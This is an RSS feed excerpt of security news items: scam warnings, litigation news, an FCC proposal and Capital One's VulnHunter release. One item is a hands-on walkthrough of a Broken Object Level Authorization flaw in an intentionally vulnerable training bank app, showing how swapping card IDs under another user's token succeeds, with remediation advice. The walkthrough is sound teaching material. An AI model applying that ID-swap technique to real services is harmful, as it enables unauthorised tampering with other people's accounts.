<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Dubai Police fraudulent visa ads" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Dubai-Police-fraudulent-visa-ads-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Dubai Police Warns Against Online Scams Promising Work and Visit Visas 1"></p>The Dubai Police fraudulent visa ads warning has cautioned the public against scams offering work visas, residency visas, and visit visas in exchange for money. According to the Anti Fraud Centre at Dubai Police's General Department of Criminal Investigation, fraudsters are using <a href="https://thecyberexpress.com/travel-booking-fraud-rises-dubai-police-warns/" target="_blank" rel="noopener">social media platforms </a>and <a href="https://thecyberexpress.com/fake-messaging-app-symoo-steals-otps/" target="_blank" rel="noopener">messaging apps </a>to circulate fake visa offers by impersonating official entities or using the names of unlicensed companies.

The advisory was issued as part of Dubai Police's Be Aware of Fraud campaign, which aims to raise awareness about online scams and help residents identify fraudulent schemes.
<h3><strong>Dubai Police Fraudulent Visa Ads Circulating on Social Media</strong></h3>
According to Dubai Police, <a href="https://www.dubaipolice.gov.ae/app/home/media/news/news-details?id=py2rrkby7pboi6yko2mrphre" target="_blank" rel="nofollow noopener">scammers are promoting visa services</a> through advertisements and messages that claim to offer work, residency, or visit visas for a fee.

The Anti <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="Fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="29042">Fraud</a> Centre said these advertisements are designed to convince victims to transfer money by falsely claiming to represent government authorities or licensed visa service providers. Some also use the names of unlicensed companies or offices to appear legitimate.

Dubai Police urged the public not to rely on such offers and reminded residents that all visa procedures should be completed only through competent authorities or legally approved offices.
<h3><strong>Authorities Urge Public to Verify Visa Offers</strong></h3>
The Anti Fraud Centre said verifying the source of a visa service is the first step in avoiding visa fraud.

Residents have been advised to confirm the authenticity of any visa offer or application process through official channels before making payments or sharing personal information. The centre also warned against dealing with intermediaries or unknown individuals claiming they can arrange visas through unofficial means.

Dubai Police said people should not be misled by promises of guaranteed visas or job opportunities that are offered outside the legal process.
<h2><strong>How to Report Fraud Attempts</strong></h2>
Dubai Police has asked members of the public to report any fraud or attempted fraud immediately.

Reports can be submitted through the Dubai Police Smart App, the eCrime platform for <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="29041">cybercrime</a> reports, or by calling 901.

The Anti Fraud Centre reiterated that staying informed and verifying service providers through official channels remain the most effective ways to avoid falling victim to fraudulent visa schemes.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Uses New Court Ruling to Pause Epic Games Case]]></title>
<description><![CDATA[Apple has cited a newly paused securities fraud lawsuit to support its request to delay further proceedings in its legal battle with Epic Games while the US Supreme Court reviews part of the dispute.



The related case was filed on behalf of the City of Coral Springs Police Officers Pension Plan...]]></description>
<link>https://tsecurity.de/de/3679455/ios-mac-os/apple-uses-new-court-ruling-to-pause-epic-games-case/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679455/ios-mac-os/apple-uses-new-court-ruling-to-pause-epic-games-case/</guid>
<pubDate>Sun, 19 Jul 2026 14:23:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has cited a newly paused securities fraud lawsuit to support its request to delay further proceedings in its legal battle with Epic Games while the US Supreme Court reviews part of the dispute.



The related case was filed on behalf of the City of Coral Springs Police Officers Pension Plan and accused Apple of misleading investors about its compliance with the Epic Games injunction and the progress of its announced AI-powered Siri features.



Judge Noël Wise recently paused that securities case until the Supreme Court decides whether Apple can face civil contempt for charging commissions on purchases completed outside the App Store.



Apple has now submitted Judge Wise’s ruling to Judge Yvonne Gonzalez Rogers, arguing that the decision supports its request to pause proceedings over what commission it can charge for external purchases.



Epic Games opposes the request and argues that the Supreme Court review should not stop the lower court from continuing its work.



Apple also asked Judge Rogers to grant a temporary pause if she rejects the main request, which would give the company time to seek relief from the Ninth Circuit or the Supreme Court.



Judge Rogers is now reviewing both sides before deciding whether the proceedings should continue.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘We noticed a login from a new device’: the message from fraudsters targeting your X account]]></title>
<description><![CDATA[They are out to steal your password to commit further fraud such as crypto scams or phishing attacksYou have had an X account for years, since it was known as Twitter. When an email arrives about a new login from a location nowhere near where you live, alarm bells begin to ring.“We noticed a logi...]]></description>
<link>https://tsecurity.de/de/3679063/it-nachrichten/we-noticed-a-login-from-a-new-device-the-message-from-fraudsters-targeting-your-x-account/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679063/it-nachrichten/we-noticed-a-login-from-a-new-device-the-message-from-fraudsters-targeting-your-x-account/</guid>
<pubDate>Sun, 19 Jul 2026 09:32:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>They are out to steal your password to commit further fraud such as crypto scams or phishing attacks</p><p>You have had an X account for years, since it was known as Twitter. When an email arrives about a new login from a location nowhere near where you live, alarm bells begin to ring.</p><p>“We noticed a login to your account from a new device. Was this you?” the email asks.</p> <a href="https://www.theguardian.com/money/2026/jul/19/x-scams-login-new-device-message-account-crypto-phishing">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[North Korean agent looking for a job (emf2026)]]></title>
<description><![CDATA[Since COVID, there has been a surge in fraud as a result of remote work. And naturally, the DPRK wants to be in on it. 

When I opened up some remote roles a while ago I was flooded with thousands of applications, that looked somewhat similar.

I then did what any cyber security professional woul...]]></description>
<link>https://tsecurity.de/de/3677948/it-security-video/north-korean-agent-looking-for-a-job-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677948/it-security-video/north-korean-agent-looking-for-a-job-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 14:03:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Since COVID, there has been a surge in fraud as a result of remote work. And naturally, the DPRK wants to be in on it. 

When I opened up some remote roles a while ago I was flooded with thousands of applications, that looked somewhat similar.

I then did what any cyber security professional would do: I did some deep digging into the operation.

Uncovering greenscreen computer vision usage to pass identity verification
Laptop mules on US soil
Use of questionable VPNs and KVMs to control remote devices
Exposing what they would do when they get access to your internal tools

Why they do it and the degrees of damage they are willing to do.
Exposing some never talked about before details about the investigation that resulted in 29 property searches, 5 arrests and imprisonments of enemies of the state.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/215-north-korean-agent-looking-for-a-job]]></content:encoded>
</item>
<item>
<title><![CDATA[North Korean agent looking for a job (emf2026)]]></title>
<description><![CDATA[Since COVID, there has been a surge in fraud as a result of remote work. And naturally, the DPRK wants to be in on it. 

When I opened up some remote roles a while ago I was flooded with thousands of applications, that looked somewhat similar.

I then did what any cyber security professional woul...]]></description>
<link>https://tsecurity.de/de/3677925/it-security-video/north-korean-agent-looking-for-a-job-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677925/it-security-video/north-korean-agent-looking-for-a-job-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 13:48:04 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Since COVID, there has been a surge in fraud as a result of remote work. And naturally, the DPRK wants to be in on it. 

When I opened up some remote roles a while ago I was flooded with thousands of applications, that looked somewhat similar.

I then did what any cyber security professional would do: I did some deep digging into the operation.

Uncovering greenscreen computer vision usage to pass identity verification
Laptop mules on US soil
Use of questionable VPNs and KVMs to control remote devices
Exposing what they would do when they get access to your internal tools

Why they do it and the degrees of damage they are willing to do.
Exposing some never talked about before details about the investigation that resulted in 29 property searches, 5 arrests and imprisonments of enemies of the state.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/215-north-korean-agent-looking-for-a-job]]></content:encoded>
</item>
<item>
<title><![CDATA[I Funded a Stranger’s Bank Card With My Own Money; and That’s Exactly the Problem]]></title>
<description><![CDATA[A hands-on walkthrough of Broken Object Level Authorization (BOLA) on VulnBankVulnBankThere’s a moment in every appsec learner’s journey where a vulnerability stops being a bullet point on the OWASP API Top 10 and starts being something you actually did. For me, that moment was watching one user’...]]></description>
<link>https://tsecurity.de/de/3677763/hacking/i-funded-a-strangers-bank-card-with-my-own-money-and-thats-exactly-the-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677763/hacking/i-funded-a-strangers-bank-card-with-my-own-money-and-thats-exactly-the-problem/</guid>
<pubDate>Sat, 18 Jul 2026 11:21:50 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>A hands-on walkthrough of Broken Object Level Authorization (BOLA) on VulnBank</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mTehjKwtISkTLR8KwRRrRw.png"><figcaption>VulnBank</figcaption></figure><p>There’s a moment in every appsec learner’s journey where a vulnerability stops being a bullet point on the OWASP API Top 10 and starts being something you actually <em>did</em>. For me, that moment was watching one user’s card get funded by another user’s session — no exploit chain, no payload, just a number in a URL that should never have worked.</p><p>This is the walkthrough of how I found (and rigorously confirmed) a Broken Object Level Authorization vulnerability in <strong>VulnBank</strong>, an intentionally vulnerable banking application built for security training.</p><h3>What Is BOLA, Actually?</h3><p>Broken Object Level Authorization sits at <strong>#1 </strong>on the <strong>OWASP API Security Top 10 </strong>(API 1: 2023), and for good reason — it’s common, trivial to exploit, and quietly devastating.</p><p>The core idea in one sentence: <strong>the server correctly checks who you are, but never checks what you’re allowed to touch.</strong></p><p>Any API endpoint that takes an object identifier — a <strong>card_id</strong>, <strong>account_number</strong>, <strong>order_id </strong>— needs to answer two separate questions:</p><ol><li><strong>Authentication: </strong>is this a valid, logged-in user?</li><li><strong>Authorization: </strong>should <em>this </em><strong><em>specific user</em> </strong>be allowed to access <em>this specific object</em>?</li></ol><p>BOLA is what happens when an API nails question one and skips question two entirely. Usually it’s one missing clause in a query.</p><p>The vulnerable version:</p><pre>SELECT * FROM cards WHERE id = :card_id</pre><p>The fixed version:</p><pre>SELECT * FROM cards WHERE id = :card_id AND user_id = :authenticated_user_id</pre><p>That’s genuinely the whole difference and because it never breaks anything during normal use (your own IDs always belong to you), it hides in plain sight until someone deliberately tries an ID that isn’t theirs.</p><p>So that’s exactly what I did — with two accounts, on purpose, so I could prove it beyond doubt rather than just suspect it.</p><h3>Setting the Stage: Two Users, Two Cards</h3><p>Testing BOLA against yourself proves nothing — you always have legitimate access to your own resources. So I set up two separate accounts to simulate a real attacker/victim scenario.</p><h3><strong>User 1 — Jhonny</strong></h3><ul><li>I created a virtual card with a <strong>$2,500 </strong>limit.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/671/1*IzNdvQ1HNkbGSk9AEz70FQ.png"><figcaption>Jhonny’s Virtual Card</figcaption></figure><ul><li>I then funded it with <strong>$80 </strong>from the main balance.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/444/1*yyZLbn89enTTeEBs4gSKow.png"><figcaption>Funding the card</figcaption></figure><p>With the funding request captured in <strong>Burp Suite</strong>, I sent it to Repeater for closer inspection, this is the request whose <strong>card_id </strong>parameter would become the centerpiece of the whole test.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EKOsjOROq-GWkyoTOSyHNw.png"><figcaption>Jhonny Card Request in Burp</figcaption></figure><h3><strong>User 2 — Alex</strong></h3><p>Same setup:</p><ul><li>A fresh virtual card of <strong>$2,500 </strong>limit.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/411/1*A-bryCWIEKgcBWvJSyHgGQ.png"><figcaption>Alex’s Virtual Card</figcaption></figure><ul><li>Funded with $100.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/697/1*H-zuUIktIse3J_FkKY4iRg.png"><figcaption>Funding Alex’s card</figcaption></figure><ul><li>And the same treatment — captured the request and sent it to Repeater.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MhtrbarCUBXaggWB7u-YBw.png"><figcaption>Alex’s Card Request in Burp</figcaption></figure><p>Two accounts, two cards, two independent funding requests sitting side by side. Now the real test could begin.</p><h3>Step One: Does the App Even Check Who You Are?</h3><p>Before hunting for authorization flaws, I checked the basics. I stripped the session cookie and Authorization header from a funding request entirely and sent it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SkZ3P_vd-a31Bxve6I1kMw.png"><figcaption>Token error (Authentication enabled)</figcaption></figure><p><strong>401 Unauthorized: "Token is missing."</strong></p><p>Good! The server clearly enforces authentication. That ruled out the simplest failure mode and pointed straight at the real question: does it check <strong><em>which</em> </strong>authenticated user is making the request, or just <strong><em>that</em> </strong>one is?</p><h3>Step Two: The Swap</h3><p>This is the actual test, and it’s almost anticlimactic in how simple it is.</p><p>I took <strong>Jhonny’s</strong> valid token and used it to fund <strong>Alex’s</strong> card:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pM9M7X-q1bMfJng1TcsNqA.png"><figcaption>Funding Alex’s card with Jhonny’s Token</figcaption></figure><p><strong>200 OK.</strong> The card funded successfully with Jhonny's session authorizing a change to Alex's card.</p><p>Then I reversed it, <strong>Alex’s</strong> token, aimed at <strong>Jhonny’s</strong> card:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-5Qqk7A4XKvrvCkqyXgRFQ.png"><figcaption>Funding Jhonny’s card with Alex’s Token</figcaption></figure><p><strong>200 OK</strong> again. Same result, opposite direction.</p><p>Neither request was rejected. The server verified that a valid token was present but never verified that the token holder actually owned the card they were funding. It simply processed whatever <strong>card_id </strong>showed up in the URL, against whichever authenticated user happened to be making the call.</p><h3>Why This Isn’t “Just a Feature”</h3><p>The first pushback any BOLA finding gets is: <strong><em>“Couldn’t this just be an intentional transfer feature?”</em></strong></p><p>It’s a fair question, and worth addressing directly.</p><p>The answer is <strong>NO</strong>, for a few concrete reasons:</p><ul><li>There was no recipient search, no username/email lookup, no way to intentionally select another user through the interface.</li><li>Neither Jhonny nor Alex received any notification or gave any consent.</li><li>The card IDs used were never exposed to either user by the application itself, they were reached only by directly editing a request in Burp, not by anything the UI ever presented as selectable.</li><li>Both requests used each user’s <em>own</em> main balance and <em>own</em> token throughout, nothing about the flow resembled a designed transfer mechanism.</li></ul><p>A designed feature has guardrails: consent steps, recipient verification, fraud checks. This had none of that, because it was never meant to be reachable in the first place.</p><h3>The Fix</h3><p>The remediation here is almost anticlimactic given the impact. This isn’t a hard problem to solve, just an easy one to forget:</p><ul><li>Every object-level query needs an explicit ownership check tied to the authenticated session: <strong>WHERE card_id = ? AND user_id = ?</strong></li><li>Better yet, enforce this centrally, an authorization layer or middleware that every object-fetching endpoint routes through, rather than relying on each developer to remember it per-endpoint</li><li>Make cross-account testing a standard part of QA and code review: test with <strong>two different authenticated accounts</strong> against each other’s objects, not just each account against its own.</li></ul><h3>The Takeaway</h3><p>BOLA doesn’t require exotic tooling or deep exploit development. It requires one thing: noticing that an ID in a URL is just a number, and asking whether the server actually checked if you were allowed to use it.</p><p>In this case, it hadn’t. Two independent accounts, each fully authenticated, could reach into each other’s resources without so much as a warning.</p><p>Authentication tells a server <em>who</em> is asking. Authorization is the separate and often forgotten question of <strong><em>what they’re allowed to ask for?</em></strong>. Every API needs both, and it’s worth checking, endpoint by endpoint, that yours actually has them.</p><p><em>This testing was performed against VulnBank, an intentionally vulnerable application built for security education and training purposes.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a3bfc069a8b9" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-funded-a-strangers-bank-card-with-my-own-money-and-that-s-exactly-the-problem-a3bfc069a8b9">I Funded a Stranger’s Bank Card With My Own Money; and That’s Exactly the Problem</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New FCC Proposal Pits Phone Privacy Against Fraud Prevention]]></title>
<description><![CDATA[The FCC has proposed requiring identity verification for phone activation, a move supporters say will fight fraud while critics warn it threatens privacy. The post New FCC Proposal Pits Phone Privacy Against Fraud Prevention appeared first on TechRepublic. This article…
Read more →
The post New F...]]></description>
<link>https://tsecurity.de/de/3677167/it-security-nachrichten/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677167/it-security-nachrichten/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/</guid>
<pubDate>Sat, 18 Jul 2026 00:37:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FCC has proposed requiring identity verification for phone activation, a move supporters say will fight fraud while critics warn it threatens privacy. The post New FCC Proposal Pits Phone Privacy Against Fraud Prevention appeared first on TechRepublic. This article…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/">New FCC Proposal Pits Phone Privacy Against Fraud Prevention</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New FCC Proposal Pits Phone Privacy Against Fraud Prevention]]></title>
<description><![CDATA[The FCC has proposed requiring identity verification for phone activation, a move supporters say will fight fraud while critics warn it threatens privacy.
The post New FCC Proposal Pits Phone Privacy Against Fraud Prevention appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3677131/it-nachrichten/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677131/it-nachrichten/new-fcc-proposal-pits-phone-privacy-against-fraud-prevention/</guid>
<pubDate>Sat, 18 Jul 2026 00:17:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The FCC has proposed requiring identity verification for phone activation, a move supporters say will fight fraud while critics warn it threatens privacy.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-fcc-phone-identity-verification-burner-phone-proposal/">New FCC Proposal Pits Phone Privacy Against Fraud Prevention</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Capital One releases VulnHunter, an open-source AI tool that finds software flaws before hackers do]]></title>
<description><![CDATA[Capital One on Thursday released VulnHunter, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and now a...]]></description>
<link>https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677035/it-nachrichten/capital-one-releases-vulnhunter-an-open-source-ai-tool-that-finds-software-flaws-before-hackers-do/</guid>
<pubDate>Fri, 17 Jul 2026 23:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.capitalone.com/">Capital One</a> on Thursday released <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, an open-source, agentic AI security tool that scans source code for exploitable vulnerabilities, maps out how an attacker would reach them, and proposes targeted fixes — all before a single line ships to production. The tool, built internally and <a href="https://github.com/capitalone/vulnhunter">now available on GitHub</a> under an Apache 2.0 license, is one of the most ambitious attempts by a major financial institution to turn offensive AI capabilities into a public defensive resource.</p><p>The move marks a striking philosophical turn for a company still defined, in many boardrooms, by a <a href="https://www.capitalone.com/digital/facts2019/">2019 data breach</a> that compromised the personal information of roughly 106 million people across the United States and Canada and ultimately cost the bank an <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">$80 million federal fine</a>.</p><p>Capital One is not simply releasing another vulnerability scanner. VulnHunter introduces what the company calls an "<a href="https://github.com/capitalone/vulnhunter">attacker-first forward analysis</a>" — a workflow in which the tool begins at the points where a real adversary would enter a system, such as APIs, network messages, or file uploads, and reasons forward through the application's logic to determine whether an exploit path actually survives the code's existing defenses. Conventional scanners typically work in reverse, flagging a dangerous-looking code pattern and then searching backward for a hypothetical attacker. That approach, security practitioners widely acknowledge, buries engineering teams under avalanches of false positives.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> attacks that problem head-on with a second innovation: a built-in "falsification engine" that tries to disprove its own findings before a developer ever sees them. After the tool surfaces a potential vulnerability, a structured reasoning workflow hunts for logical gaps, unsupported assumptions, and conditions that would prevent the attack from succeeding. Only findings the engine fails to rule out reach a human reviewer — and when they do, VulnHunter delivers not just an alert but a full explanation of the exploit path and a proposed code fix ready for engineering review.</p><p>The tool currently runs on Anthropic's <a href="https://www.anthropic.com/news/claude-opus-4-8">Claude Opus 4.8 model</a> inside a Claude Code environment, though Capital One says the framework has the potential to work across other foundation models and coding harnesses.</p><h2><b>The 2019 breach that reshaped how Capital One thinks about cybersecurity</b></h2><p>To understand why Capital One chose to open-source a tool this consequential, you have to understand the scar tissue.</p><p>On July 19, 2019, <a href="https://www.capitalone.com/digital/facts2019/">Capital One disclosed </a>that an outside individual — later identified as a former Amazon Web Services employee named Paige Thompson — had gained unauthorized access to names, addresses, self-reported income, Social Security numbers, and linked bank account numbers belonging to credit card customers and applicants. The breach, which Capital One says occurred on March 22 and 23, 2019, was discovered only after an external security researcher flagged a configuration vulnerability through the company's <a href="https://www.capitalone.com/digital/responsible-disclosure/">Responsible Disclosure Program</a> on July 17 of that year.</p><p>The damage was sweeping. Approximately <a href="https://www.npr.org/2019/07/30/746687015/100-million-people-in-the-u-s-affected-by-capital-one-data-breach">100 million people in the United States</a> and 6 million in Canada were affected. Roughly 140,000 Social Security numbers, about 80,000 linked bank account numbers, and approximately 1 million Canadian Social Insurance Numbers were compromised. The FBI arrested Thompson, and the government stated it believed the data had been recovered with no evidence of fraud. But the reputational and regulatory toll was enormous.</p><p>In August 2020, the Office of the Comptroller of the Currency <a href="https://www.occ.gov/news-issuances/news-releases/2020/nr-occ-2020-101.html">fined Capital One $80 million</a>, finding that the bank had failed to adequately identify and manage risks as it migrated significant technology operations to the cloud. As Reuters reported at the time, the OCC's consent order cited insufficient network security controls, inadequate data loss prevention measures, and a board that failed to hold management accountable when internal auditing surfaced problems. The OCC also ordered Capital One to overhaul its operations and submit new cybersecurity plans for regulatory review.</p><p>The incident became an industry case study in the dangers of moving fast with new technology. As <a href="https://cyberscoop.com/capital-one-hack-banking-security/">CyberScoop reported</a> in July 2019, a cybersecurity executive at a competing financial company observed that the breach "could be the result of trying too many new things and forcing them through." Capital One's own CEO, Richard D. Fairbank, acknowledged the gravity of the moment. "While I am grateful that the perpetrator has been caught, I am deeply sorry for what has happened," Fairbank said at the time. "I sincerely apologize for the understandable worry this incident must be causing those affected and I am committed to making it right."</p><h2><b>How Capital One rebuilt its security reputation through open-source investment</b></h2><p>What followed was not a retreat from technology but a doubling down — with security explicitly at the center.</p><p>Capital One had declared itself an "<a href="https://capitalonesoftware.com/blog/cloud-migration-journey">open-source first</a>" company in 2015 as part of a broader technology transformation that began over a decade ago. After the breach, the company accelerated its investments in software supply chain security, open-source governance, and AI-driven defense. In August 2022, Capital One joined the <a href="https://openssf.org/">Open Source Security Foundation</a> as a premier member, earning a seat on the organization's Governing Board. Chris Nims, then EVP of Cloud &amp; Productivity Engineering, framed the move as a natural extension of the company's operating philosophy. "As a highly-regulated company, we are seasoned in managing compliance and governance and advocate for standardization, automation and collaboration," Nims said in the <a href="https://openssf.org/press-release/2022/08/24/capital-one-joins-open-source-security-foundation/">OpenSSF announcement</a>.</p><p>Behind that public commitment lay a substantial operational apparatus. Capital One's <a href="https://www.capitalone.com/tech/open-source/">Open Source Program Office</a>, now in its third iteration, manages open-source usage, contributions, and community building across the enterprise. The company has released more than 25 open-source projects and made over 2,000 contributions to approximately 135 external open-source projects, according to the company's own disclosures. Those efforts address not just code dependencies but the entire software development lifecycle — DevSecOps tools, infrastructure, and the collaborative environments, both internal and external, that shape how software gets built and shipped.</p><p>Nureen D'Souza, the director who leads Capital One's OSPO, has spoken publicly about the philosophy underpinning this work. At cdCon 2022, D'Souza described a "company-wide culture with security ingrained" that allows developers to focus on innovation rather than maintenance chores, as <a href="https://sdtimes.com/os/how-capital-one-is-strengthening-the-software-supply-chain/">reported by SD Times</a>. The OSPO's charter emphasizes three pillars: standardization of open-source processes, automation of security policies throughout the delivery pipeline, and ecosystem sustainability through upstream contributions to the foundations and projects the company depends on.</p><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> is the most consequential product of that multi-year effort — and the clearest signal yet that Capital One views open-source collaboration not as charity but as a competitive security strategy. The company argues that modern software supply chains are so deeply interconnected that a single vulnerability in a widely used open-source component can cascade across thousands of enterprises simultaneously. Proprietary defenses, no matter how sophisticated, cannot address a problem that is fundamentally communal. By releasing VulnHunter under a permissive license, Capital One invites the global security research community to stress-test, extend, and improve the tool — effectively crowdsourcing its own defense infrastructure while strengthening the broader ecosystem.</p><h2><b>Inside VulnHunter's three-stage AI engine for finding exploitable code</b></h2><p>For engineering leaders evaluating <a href="https://github.com/capitalone/vulnhunter">VulnHunter</a>, the technical architecture is where the tool's ambitions become concrete. The workflow unfolds in three distinct stages.</p><p>In the first stage — attacker-first forward analysis — VulnHunter begins at the points where an external adversary would interact with a system: API endpoints, network message handlers, file upload interfaces. From each entry point, the tool reasons forward through application logic, tracing data flows, transformations, and internal security checkpoints to determine whether an attacker can actually reach a dangerous code path. This approach mirrors how a skilled penetration tester would probe a system, but automates the process at a scale no human team could match.</p><p>The second stage is where VulnHunter departs most sharply from conventional scanners. After identifying a potential vulnerability, the falsification engine runs a structured reasoning workflow designed to disprove its own conclusion. It searches for assumptions that do not hold, logical gaps in the exploit path, and environmental conditions that would prevent an attack from succeeding. Findings that fail this internal challenge are discarded before any developer sees them. Capital One's explicit goal is to shift the developer's burden away from triaging false alarms — a perennial pain point that erodes trust in security tooling and slows development velocity.</p><p>In the third stage, vulnerabilities that survive the falsification engine trigger an evidence-backed remediation workflow. VulnHunter gathers supporting evidence across the codebase, maps the complete surviving exploit path, explains the defect and the specific capabilities an attacker would gain, and generates targeted code changes for engineering review. The output is not a generic advisory but a concrete, context-aware patch proposal.</p><p>Capital One says it validated VulnHunter internally before release, running it across thousands of repositories spanning tens of business areas. The company reports that the tool identified and remediated vulnerabilities with speed and efficiency that far exceeded what its teams previously achieved through manual triage.</p><h2><b>Why AI-powered attacks are forcing banks to rethink traditional cyber defenses</b></h2><p><a href="https://github.com/capitalone/vulnhunter">VulnHunter</a> arrives at a moment when the cybersecurity landscape is shifting beneath the feet of every enterprise. Capital One's announcement frames the urgency in stark terms: advanced AI models have "dramatically lowered the barrier for bad actors to discover and exploit vulnerabilities in software," and the window before sophisticated AI attack capabilities become affordable and accessible to virtually every adversary is shrinking rapidly.</p><p>The company's own AI security researchers have been tracking these trends closely. At <a href="https://www.capitalone.com/tech/software-engineering/secon-2024/">NeurIPS 2024</a> in Vancouver, Capital One's team presented research and curated a list of nearly 100 papers spanning LLM safety, adversarial resilience, jailbreak attacks, and synthetic data generation. The papers they highlighted — including work on multi-agent defense frameworks, automated red-teaming, and guardrail classifiers — paint a picture of an arms race in which offensive and defensive AI capabilities are co-evolving at breakneck speed.</p><p>Several of those research themes map directly onto VulnHunter's architecture. The falsification engine echoes the adversarial defense strategies explored in papers like "<a href="https://pure.psu.edu/en/publications/backdooralign-mitigating-fine-tuning-based-jailbreak-attack-with-/fingerprints/?sortBy=alphabetically">BackdoorAlign</a>," which demonstrated that 